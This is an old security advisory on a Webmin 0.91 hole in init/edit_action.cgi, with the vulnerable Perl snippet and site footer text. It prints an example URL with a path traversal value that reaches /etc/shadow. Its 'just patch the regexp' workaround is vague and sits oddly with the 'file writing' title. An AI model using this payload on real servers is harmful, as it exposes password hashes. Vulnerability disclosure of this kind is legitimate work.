18th Dec 2001 [SBWID-4930]
COMMAND
webmin local file writing
SYSTEMS AFFECTED
webmin 0.91
PROBLEM
A. Ramos found that it is possible to write arbitrary files on the
server.
With this software you can start and stop services with simple user,
and edit init scripts. like this:
http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev
but you can use this:
http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow
The problem reside on init/edit_action.cgi:
<snip>
open(FILE, $file);
while(<FILE>) {
$data .= $_;
if (/^\\s*([\'\"]?)([a-z]+)\\1\\)/i) {
$hasarg{$2}++;
}
}
close(FILE);
</snip>
SOLUTION
If you have ability to edit init script, you won\'t crash your system.
Will you ?
Workaround
==========
just patch the regexp...
The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.
